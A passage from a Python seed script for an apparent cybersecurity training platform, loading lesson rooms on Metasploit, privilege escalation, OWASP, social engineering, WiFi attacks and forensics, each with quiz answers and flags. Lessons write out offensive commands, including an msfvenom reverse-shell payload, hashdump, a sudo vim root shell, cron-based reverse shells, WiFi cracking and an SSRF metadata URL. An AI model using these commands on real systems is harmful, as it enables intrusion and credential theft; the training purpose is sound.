        'question':'What Metasploit module type runs AFTER a successful exploit to maintain access?',
        'flag':'post', 'hint':'After exploitation...', 'points':10 },
      { 'order_index':3, 'title':'Searching for Exploits',
        'content':'Inside msfconsole: search eternalblue finds the famous Windows exploit. search type:exploit platform:windows finds all Windows exploits. use exploit/windows/smb/ms17_010_eternalblue selects it.',
        'question':'What command in msfconsole finds modules matching a keyword?',
        'flag':'search', 'hint':'You search for what you need...', 'points':10 },
      { 'order_index':4, 'title':'Setting Options',
        'content':'After selecting a module: show options lists required settings. set RHOSTS 192.168.1.1 sets the target IP. set LHOST 192.168.1.100 sets your IP. set LPORT 4444 sets the listening port. show options again to confirm.',
        'question':'What Metasploit command shows all configurable options for the current module?',
        'flag':'show options', 'hint':'Show me the options...', 'points':10 },
      { 'order_index':5, 'title':'Meterpreter',
        'content':'Meterpreter is Metasploit\'s advanced payload. After exploitation, it gives you an interactive shell on the target. Commands: sysinfo (system info), hashdump (steal password hashes), download file.txt, screenshot.',
        'question':'What Meterpreter command dumps the password hashes from a Windows system?',
        'flag':'hashdump', 'hint':'Dump the hashes...', 'points':15 },
      { 'order_index':6, 'title':'EternalBlue (MS17-010)',
        'content':'EternalBlue is a leaked NSA exploit targeting Windows SMB (port 445). It was used in the WannaCry ransomware attack in 2017, infecting 200,000 computers globally. In Metasploit: exploit/windows/smb/ms17_010_eternalblue.',
        'question':'Which global ransomware attack in 2017 used the EternalBlue exploit?',
        'flag':'WannaCry', 'hint':'It made you wanna cry...', 'points':15 },
      { 'order_index':7, 'title':'Reverse Shell vs Bind Shell',
        'content':'Reverse shell: victim connects BACK to the attacker. Better because victim firewalls usually block incoming. Bind shell: attacker connects TO victim. Harder due to firewalls. Most Metasploit payloads use reverse shells.',
        'question':'Which shell type has the victim connecting back to the attacker?',
        'flag':'reverse shell', 'hint':'It goes in reverse...', 'points':10 },
      { 'order_index':8, 'title':'msfvenom',
        'content':'msfvenom creates standalone payloads (malware). Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe > evil.exe. This creates a Windows executable that calls back to you.',
        'question':'What Metasploit tool creates standalone payload files?',
        'flag':'msfvenom', 'hint':'MSF venom...', 'points':10 },
      { 'order_index':9, 'title':'Post Exploitation',
        'content':'After getting a shell: run post/multi/recon/local_exploit_suggester to find privilege escalation paths. run post/windows/gather/credentials to harvest passwords. Pivoting: use the compromised machine to attack deeper into the network.',
        'question':'What is it called when you use a compromised machine to attack further into a network?',
        'flag':'pivoting', 'hint':'You pivot through the network...', 'points':15 },
      { 'order_index':10, 'title':'Metasploit Room Flag',
        'content':'Incredible! You now know msfconsole, modules, search, options, Meterpreter, EternalBlue, reverse shells, msfvenom, and post-exploitation. Metasploit is the most important tool in a penetration tester\'s toolkit.',
        'question':'Submit the room flag: FLAG{metasploit_elite_hacker}',
        'flag':'FLAG{metasploit_elite_hacker}', 'hint':'Written above...', 'points':30 },
    ]
  },

  # ── ROOM 11 ─────────────────────────────────────────────────────────────
  { 'title':'Privilege Escalation', 'icon':'⬆️', 'category':'Exploitation',
    'difficulty':'Advanced', 'order_index':11,
    'description':'Learn how attackers go from normal user to full system control.',
    'tasks':[
      { 'order_index':1, 'title':'What is Privilege Escalation?',
        'content':'After hacking into a system you often land as a low-privilege user. Privilege escalation (privesc) is the art of gaining higher privileges — ideally root on Linux or SYSTEM on Windows.',
        'question':'What is the highest privilege user called on Linux?',
        'flag':'root', 'hint':'The root of all power...', 'points':10 },
      { 'order_index':2, 'title':'Checking Your Privileges',
        'content':'First thing after getting a shell: id (Linux) or whoami /priv (Windows). Then: sudo -l on Linux to see what commands you can run as root. uname -a for kernel version. Groups you belong to matter too.',
        'question':'What Linux command shows what commands you can run as root without a password?',
        'flag':'sudo -l', 'hint':'Sudo list...', 'points':10 },
      { 'order_index':3, 'title':'SUID Binaries',
        'content':'SUID (Set User ID) binaries run as their OWNER regardless of who executes them. Find them: find / -perm -4000 2>/dev/null. If /bin/bash has SUID set by root, running it gives you root. GTFOBins.github.io lists exploitable ones.',
        'question':'What website lists exploitable SUID binaries for privilege escalation?',
        'flag':'GTFOBins', 'hint':'Get The F* Out of Bins...', 'points':15 },
      { 'order_index':4, 'title':'Sudo Misconfigurations',
        'content':'If sudo -l shows: (ALL) NOPASSWD: /usr/bin/vim, you can run vim as root. In vim, type :!/bin/bash to get a root shell. Many admins accidentally give users dangerous sudo permissions.',
        'question':'What sudo output means you can run a command as root without entering a password?',
        'flag':'NOPASSWD', 'hint':'No password required...', 'points':10 },
      { 'order_index':5, 'title':'Kernel Exploits',
        'content':'Old kernels have public exploits. Run uname -a to get kernel version, then search exploitdb.com or searchsploit. Example: Linux 4.4.0 is vulnerable to "Dirty COW" (CVE-2016-5195). Compile and run the exploit to get root.',
        'question':'What is the CVE number for the famous "Dirty COW" kernel exploit?',
        'flag':'CVE-2016-5195', 'hint':'It is in the content above...', 'points':15 },
      { 'order_index':6, 'title':'Cron Jobs',
        'content':'Cron jobs run scheduled tasks. View them: cat /etc/crontab. If a cron script is writable by you but runs as root, replace it with a reverse shell. The cron will execute your shell as root on schedule.',
        'question':'What file lists system-wide scheduled cron jobs on Linux?',
        'flag':'/etc/crontab', 'hint':'Etc crontab...', 'points':10 },
      { 'order_index':7, 'title':'Password Hunting',
        'content':'Credentials hide in plain sight. Check: cat /etc/passwd, cat /var/www/html/config.php, history, find / -name "*.conf" 2>/dev/null. Developers often hardcode database passwords in config files.',
        'question':'What Linux file contains user account information (but NOT passwords in modern systems)?',
        'flag':'/etc/passwd', 'hint':'Etc passwd...', 'points':10 },
      { 'order_index':8, 'title':'Windows Privilege Escalation',
        'content':'On Windows: whoami /priv. Look for SeImpersonatePrivilege — exploitable with Juicy Potato. Unquoted service paths are another classic. PowerUp.ps1 and winPEAS automate Windows privesc enumeration.',
        'question':'What Windows privilege is exploitable using the Juicy Potato attack?',
        'flag':'SeImpersonatePrivilege', 'hint':'It is in the content above...', 'points':15 },
      { 'order_index':9, 'title':'Privilege Escalation Room Flag',
        'content':'You are now an advanced attacker! You know SUID, sudo misconfigs, kernel exploits, cron jobs, password hunting, and Windows privesc. These skills are the difference between a script kiddie and a real pentester.',
        'question':'Submit the room flag: FLAG{root_access_granted}',
        'flag':'FLAG{root_access_granted}', 'hint':'Written above...', 'points':30 },
    ]
  },

  # ── ROOM 12 ─────────────────────────────────────────────────────────────
  { 'title':'OWASP Top 10', 'icon':'🛡️', 'category':'Web Security',
    'difficulty':'Intermediate', 'order_index':12,
    'description':'Learn the 10 most critical web application security risks.',
    'tasks':[
      { 'order_index':1, 'title':'What is OWASP?',
        'content':'OWASP (Open Web Application Security Project) is a nonprofit that publishes the Top 10 most critical web vulnerabilities. Every web developer and security professional must know these.',
        'question':'What does OWASP stand for?',
        'flag':'Open Web Application Security Project', 'hint':'Open, Web, Application, Security, Project...', 'points':10 },
      { 'order_index':2, 'title':'A01: Broken Access Control',
        'content':'The #1 OWASP risk. Users access pages they should not. Example: changing /profile?id=123 to /profile?id=124 and seeing someone else\'s data. Also includes accessing /admin without being an admin.',
        'question':'What is it called when a user accesses resources they are not authorized to see?',
        'flag':'broken access control', 'hint':'The controls that restrict access are broken...', 'points':10 },
      { 'order_index':3, 'title':'A02: Cryptographic Failures',
        'content':'Sensitive data (passwords, credit cards, health data) stored or transmitted without proper encryption. Using MD5 for passwords, transmitting data over HTTP instead of HTTPS, or using weak TLS are all cryptographic failures.',
        'question':'What protocol should be used instead of HTTP to encrypt web traffic?',
        'flag':'HTTPS', 'hint':'The secure version of HTTP...', 'points':10 },
      { 'order_index':4, 'title':'A03: Injection',
        'content':'SQL, command, LDAP, and XPath injection. Untrusted data sent to an interpreter as part of a command or query. SQL injection is the classic example. Prevention: parameterized queries, input validation.',
        'question':'What type of injection attacks the database layer?',
        'flag':'SQL injection', 'hint':'SQL being injected...', 'points':10 },
      { 'order_index':5, 'title':'A04: Insecure Design',
        'content':'Security flaws in the design itself, not just implementation. A password reset that emails a code but never expires it, or a "security question" that can be guessed. No amount of coding fixes a broken design.',
        'question':'Can implementation fixes alone solve insecure design problems? Answer yes or no.',
        'flag':'no', 'hint':'You cannot code your way out of bad design...', 'points':10 },
      { 'order_index':6, 'title':'A05: Security Misconfiguration',
        'content':'Default passwords left unchanged, unnecessary features enabled, error messages revealing stack traces, S3 buckets left public, debug mode on in production. The most common real-world finding in pentests.',
        'question':'What is it called when a server is left with its factory-default settings and passwords?',
        'flag':'security misconfiguration', 'hint':'The security was misconfigured...', 'points':10 },
      { 'order_index':7, 'title':'A06: Vulnerable Components',
        'content':'Using libraries or frameworks with known vulnerabilities. The 2017 Equifax breach exposed 147 million people because they used a vulnerable Apache Struts version. Always update your dependencies.',
        'question':'What major US company was breached in 2017 due to a vulnerable software component?',
        'flag':'Equifax', 'hint':'A credit reporting company...', 'points':10 },
      { 'order_index':8, 'title':'A07: Auth Failures',
        'content':'Broken authentication: weak passwords allowed, no brute force protection, session tokens in URLs, sessions that never expire, no multi-factor authentication. Allows attackers to compromise accounts.',
        'question':'What is the term for a second verification method beyond just a password?',
        'flag':'multi-factor authentication', 'hint':'Multiple factors to authenticate...', 'points':10 },
      { 'order_index':9, 'title':'A10: SSRF',
        'content':'SSRF (Server-Side Request Forgery) tricks a server into making requests to internal resources. Example: a website fetches a URL you provide. Entering http://169.254.169.254/latest/meta-data/ may expose AWS credentials.',
        'question':'What does SSRF stand for?',
        'flag':'Server-Side Request Forgery', 'hint':'The server is forging requests on your behalf...', 'points':15 },
      { 'order_index':10, 'title':'OWASP Room Flag',
        'content':'Outstanding! You now know the OWASP Top 10: Broken Access Control, Crypto Failures, Injection, Insecure Design, Misconfiguration, Vulnerable Components, Auth Failures, and SSRF.',
        'question':'Submit the room flag: FLAG{owasp_security_expert}',
        'flag':'FLAG{owasp_security_expert}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 13 ─────────────────────────────────────────────────────────────
  { 'title':'Social Engineering', 'icon':'🎭', 'category':'Human Hacking',
    'difficulty':'Beginner', 'order_index':13,
    'description':'Learn how hackers manipulate humans — the weakest link in security.',
    'tasks':[
      { 'order_index':1, 'title':'What is Social Engineering?',
        'content':'Social engineering exploits human psychology rather than technical vulnerabilities. It is often easier to trick a human than to hack a firewall. 98% of cyber attacks involve social engineering.',
        'question':'What percentage of cyber attacks involve social engineering? (from the content above)',
        'flag':'98', 'hint':'It is in the reading...', 'points':10 },
      { 'order_index':2, 'title':'Phishing',
        'content':'Phishing sends fake emails pretending to be trusted sources (banks, Google, your boss). They trick you into clicking a link, entering credentials on a fake site, or downloading malware. 3.4 billion phishing emails are sent daily.',
        'question':'What type of phishing specifically targets a named individual (e.g. the CEO)?',
        'flag':'spear phishing', 'hint':'A spear is more precise than a net...', 'points':10 },
      { 'order_index':3, 'title':'Pretexting',
        'content':'Pretexting means creating a fake scenario (pretext) to extract information. "Hi, this is IT support — we need your password to fix your account." A legitimate IT department NEVER asks for your password.',
        'question':'Will a legitimate IT department ever ask for your password?',
        'flag':'no', 'hint':'Never ever...', 'points':10 },
      { 'order_index':4, 'title':'Baiting',
        'content':'Baiting leaves infected USB drives in parking lots labeled "Salary List 2024". Curious employees plug them in. The malware autoinstalls. Studies show 45-98% of dropped USBs get plugged in by employees.',
        'question':'What physical object is commonly used in baiting attacks?',
        'flag':'USB drive', 'hint':'A small storage device...', 'points':10 },
      { 'order_index':5, 'title':'Vishing',
        'content':'Vishing (Voice Phishing) uses phone calls. Attackers impersonate banks, the IRS, or tech support. They create urgency: "Your account will be deleted in 1 hour unless you provide your PIN."',
        'question':'What does Vishing stand for?',
        'flag':'Voice Phishing', 'hint':'Phishing by voice...', 'points':10 },
      { 'order_index':6, 'title':'Tailgating',
        'content':'Tailgating (piggy backing) is physically following someone through a secured door without your own access card. Attackers dress as delivery people or maintenance workers. Social pressure makes people hold doors open.',
        'question':'What is the physical social engineering attack of following someone through a secure door called?',
        'flag':'tailgating', 'hint':'Following right behind like a tail...', 'points':10 },
      { 'order_index':7, 'title':'SET - Social Engineering Toolkit',
        'content':'SET (Social Engineering Toolkit) is a Kali Linux tool. It creates fake login pages that clone real websites, automates phishing campaigns, and generates malware-laced files. Command: setoolkit.',
        'question':'What is the command to launch the Social Engineering Toolkit?',
        'flag':'setoolkit', 'hint':'SET toolkit...', 'points':10 },
      { 'order_index':8, 'title':'Defending Against Social Engineering',
        'content':'Defenses: Security awareness training, verify caller identity by calling back on official numbers, never click email links (type URLs manually), enable MFA, report suspicious contacts to IT.',
        'question':'What is the most effective defense against social engineering attacks?',
        'flag':'security awareness training', 'hint':'Educating people is the best defense...', 'points':10 },
      { 'order_index':9, 'title':'Social Engineering Room Flag',
        'content':'Humans are the biggest vulnerability! You now know phishing, spear phishing, pretexting, baiting, vishing, tailgating, SET, and social engineering defenses.',
        'question':'Submit the room flag: FLAG{human_hacker_2024}',
        'flag':'FLAG{human_hacker_2024}', 'hint':'Written above...', 'points':25 },
    ]
  },

  # ── ROOM 14 ─────────────────────────────────────────────────────────────
  { 'title':'Wireless Security', 'icon':'📶', 'category':'Network Attacks',
    'difficulty':'Advanced', 'order_index':14,
    'description':'Learn how WiFi networks are attacked and secured.',
    'tasks':[
      { 'order_index':1, 'title':'WiFi Security Protocols',
        'content':'WEP (1999) — completely broken, cracked in minutes. WPA (2003) — better but still vulnerable. WPA2 (2004) — current standard, strong with good passwords. WPA3 (2018) — most secure, not yet universal.',
        'question':'Which WiFi security protocol from 1999 is completely broken and should never be used?',
        'flag':'WEP', 'hint':'The oldest one...', 'points':10 },
      { 'order_index':2, 'title':'Monitor Mode',
        'content':'Your WiFi card has two modes: Managed (normal use) and Monitor (capture ALL nearby packets, not just yours). Enable: airmon-ng start wlan0. This creates wlan0mon. Required for all WiFi attacks.',
        'question':'What aircrack-ng command enables monitor mode on wlan0?',
        'flag':'airmon-ng start wlan0', 'hint':'Airmon-ng to start monitor mode...', 'points':10 },
      { 'order_index':3, 'title':'Capturing Handshakes',
        'content':'WPA2 can be cracked offline if you capture a 4-way handshake (happens when a device connects to WiFi). airodump-ng wlan0mon captures it. aireplay-ng sends deauth packets to force reconnections.',
        'question':'What type of network packet exchange is needed to crack WPA2 offline?',
        'flag':'handshake', 'hint':'A 4-way handshake...', 'points':10 },
      { 'order_index':4, 'title':'Cracking WPA2',
        'content':'With a captured handshake file: aircrack-ng -w rockyou.txt handshake.cap. It tries every password in the wordlist against the handshake. If the WiFi password is "password123" and it\'s in rockyou.txt — cracked.',
        'question':'What wordlist file is commonly used with aircrack-ng to crack WiFi passwords?',
        'flag':'rockyou.txt', 'hint':'The most famous wordlist...', 'points':10 },
      { 'order_index':5, 'title':'Evil Twin Attack',
        'content':'An Evil Twin sets up a fake WiFi hotspot with the same name (SSID) as a real one. The attacker sends deauth packets to kick users off the real network. Users reconnect to the fake one. All their traffic goes through the attacker.',
        'question':'What is the attack called where a fake WiFi network impersonates a legitimate one?',
        'flag':'evil twin', 'hint':'A wicked copy...', 'points':15 },
      { 'order_index':6, 'title':'WPS Attacks',
        'content':'WPS (WiFi Protected Setup) uses an 8-digit PIN. The PIN is checked in two 4-digit halves, meaning only 11,000 combinations (not 100 million). Reaver and Bully exploit this: reaver -i wlan0mon -b [MAC] -vv.',
        'question':'How many effective combinations does a WPS PIN have due to its design flaw?',
        'flag':'11000', 'hint':'Eleven thousand...', 'points':15 },
      { 'order_index':7, 'title':'PMKID Attack',
        'content':'A modern WPA2 crack that does NOT need to wait for a handshake. The PMKID is a hash value broadcast by the router and can be captured with hcxdumptool. Then cracked with hashcat. Works even if nobody is connected.',
        'question':'Does the PMKID attack require waiting for a user to connect? Answer yes or no.',
        'flag':'no', 'hint':'That is its advantage...', 'points':15 },
      { 'order_index':8, 'title':'WiFi Defence',
        'content':'Defences: Use WPA3, use long random passwords (20+ chars so rockyou.txt fails), disable WPS, hide SSID (minor), use 5GHz band (shorter range), monitor connected devices regularly.',
        'question':'Which WiFi security protocol (newest) should you use for best protection?',
        'flag':'WPA3', 'hint':'The 2018 standard...', 'points':10 },
      { 'order_index':9, 'title':'Wireless Room Flag',
        'content':'You are a wireless security expert! You know WEP/WPA/WPA3, monitor mode, handshake capture, aircrack-ng, evil twin, WPS attacks, PMKID, and WiFi defences.',
        'question':'Submit the room flag: FLAG{wifi_hacker_expert}',
        'flag':'FLAG{wifi_hacker_expert}', 'hint':'Written above...', 'points':30 },
    ]
  },

  # ── ROOM 15 ─────────────────────────────────────────────────────────────
  { 'title':'Incident Response & Forensics', 'icon':'🔍', 'category':'Defensive',
    'difficulty':'Intermediate', 'order_index':15,
    'description':'Learn how defenders detect, investigate, and respond to cyber attacks.',
    'tasks':[
      { 'order_index':1, 'title':'What is Incident Response?',
        'content':'Incident Response (IR) is the process of detecting, investigating, containing, and recovering from a cyberattack. The IR lifecycle: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned.',
        'question':'How many phases are in the standard Incident Response lifecycle?',
        'flag':'6', 'hint':'Count the phases listed above...', 'points':10 },
      { 'order_index':2, 'title':'Digital Forensics',
        'content':'Digital forensics recovers and analyzes evidence from computers, phones, and networks. Key rule: never work on the original evidence — always make a bit-for-bit copy (image) first using tools like dd or FTK Imager.',
        'question':'What must you create before analyzing digital evidence to preserve the original?',
        'flag':'image', 'hint':'A bit-for-bit copy/image...', 'points':10 },
      { 'order_index':3, 'title':'Log Analysis',
        'content':'Logs are the most important forensic artifact. Linux: /var/log/auth.log (login attempts), /var/log/syslog (system events). Windows: Event Viewer, Security log (Event ID 4625 = failed login, 4624 = success).',
        'question':'On Linux, which log file records all login attempts (successful and failed)?',
        'flag':'/var/log/auth.log', 'hint':'Auth log in var log...', 'points':10 },
      { 'order_index':4, 'title':'Indicators of Compromise (IOCs)',
        'content':'IOCs are evidence that a system has been breached: unusual outbound connections, unknown processes running, modified system files, accounts created at odd hours, spike in CPU/network usage.',
        'question':'What is the term for evidence that a system has been compromised?',
        'flag':'indicators of compromise', 'hint':'Indicators that something was compromised...', 'points':10 },
      { 'order_index':5, 'title':'Volatility - Memory Forensics',
        'content':'Volatility analyzes RAM dumps. RAM contains running processes, open network connections, encryption keys, and logged-in users — all lost when the computer shuts down. Capture RAM first with winpmem or LiME before powering off.',
        'question':'What type of memory can Volatility analyze from a captured dump file?',
        'flag':'RAM', 'hint':'Random Access Memory...', 'points':10 },
      { 'order_index':6, 'title':'Wireshark',
        'content':'Wireshark captures and analyzes network packets. Filter by protocol: http, dns, tcp. Filter by IP: ip.addr==192.168.1.1. Follow a TCP stream to see a full conversation. Essential for detecting data exfiltration.',
        'question':'What Wireshark display filter shows only HTTP traffic?',
        'flag':'http', 'hint':'Just the protocol name in lowercase...', 'points':10 },
      { 'order_index':7, 'title':'Autopsy - Disk Forensics',
        'content':'Autopsy is a free graphical forensics tool. It recovers deleted files, shows browser history, finds recently accessed files, and searches for keywords across entire disk images. Used by law enforcement worldwide.',
        'question':'Can Autopsy recover deleted files from a disk image? Answer yes or no.',
        'flag':'yes', 'hint':'That is one of its main features...', 'points':10 },
      { 'order_index':8, 'title':'SIEM Systems',
        'content':'SIEM (Security Information and Event Management) aggregates logs from all systems in one place. Splunk, IBM QRadar, and Microsoft Sentinel are popular SIEMs. They alert on suspicious patterns like 100 failed logins.',
        'question':'What does SIEM stand for?',
        'flag':'Security Information and Event Management', 'hint':'It is in the content above...', 'points':10 },
      { 'order_index':9, 'title':'Chain of Custody',
        'content':'Chain of custody documents who handled evidence, when, and what was done with it. Any break in chain of custody can make evidence inadmissible in court. Every forensic action must be documented.',
        'question':'What documentation ensures digital evidence is valid for use in court?',
        'flag':'chain of custody', 'hint':'A chain of who had custody...', 'points':15 },
      { 'order_index':10, 'title':'Final Room Flag',
        'content':'CONGRATULATIONS! You have completed all 15 rooms of CyberSandbox! You are now equipped with knowledge of Linux, networking, web security, SQLi, XSS, crypto, passwords, recon, Nmap, Metasploit, privesc, OWASP, social engineering, wireless, and forensics.',
        'question':'Submit the final flag: FLAG{CYBERSANDBOX_CHAMPION_2024}',
        'flag':'FLAG{CYBERSANDBOX_CHAMPION_2024}', 'hint':'The ultimate flag is written above...', 'points':100 },
    ]
  },

]

# ─── BADGES ─────────────────────────────────────────────────────────────────
badges_data = [
    { 'name':'First Blood',       'icon':'🩸', 'description':'Complete your very first task',          'requirement_type':'solves',  'requirement_value':1   },
    { 'name':'Getting Started',   'icon':'🚀', 'description':'Complete 10 tasks',                      'requirement_type':'solves',  'requirement_value':10  },
    { 'name':'Halfway There',     'icon':'⚡', 'description':'Complete 50 tasks',                      'requirement_type':'solves',  'requirement_value':50  },
    { 'name':'Task Master',       'icon':'💻', 'description':'Complete 100 tasks',                     'requirement_type':'solves',  'requirement_value':100 },
    { 'name':'Point Collector',   'icon':'💰', 'description':'Earn 100 points',                        'requirement_type':'points',  'requirement_value':100 },
    { 'name':'Hacker',            'icon':'🔐', 'description':'Earn 500 points',                        'requirement_type':'points',  'requirement_value':500 },
    { 'name':'Elite Hacker',      'icon':'👑', 'description':'Earn 1000 points',                       'requirement_type':'points',  'requirement_value':1000},
    { 'name':'Room Clearer',      'icon':'🏠', 'description':'Complete your first room',               'requirement_type':'rooms',   'requirement_value':1   },
    { 'name':'Explorer',          'icon':'🗺️', 'description':'Complete 5 rooms',                       'requirement_type':'rooms',   'requirement_value':5   },
    { 'name':'Champion',          'icon':'🏆', 'description':'Complete all 15 rooms',                  'requirement_type':'rooms',   'requirement_value':15  },
]

with app.app_context():
    db.create_all()

    if Room.query.count() == 0:
        for rd in rooms_data:
            tasks_list = rd.pop('tasks')
            room = Room(**rd)
            db.session.add(room)
            db.session.flush()
            for td in tasks_list:
                task = Task(room_id=room.id, **td)
                db.session.add(task)
        db.session.commit()
        print(f"✅ {len(rooms_data)} rooms added!")

    if Badge.query.count() == 0:
        for bd in badges_data:
            db.session.add(Badge(**bd))
        db.session.commit()
        print(f"✅ {len(badges_data)} badges added!")

    print(f"\n📊 Database summary:")
    print(f"   Rooms:  {Room.query.count()}")
    print(f"   Tasks:  {Task.query.count()}")
    print(f"   Badges: {Badge.query.count()}")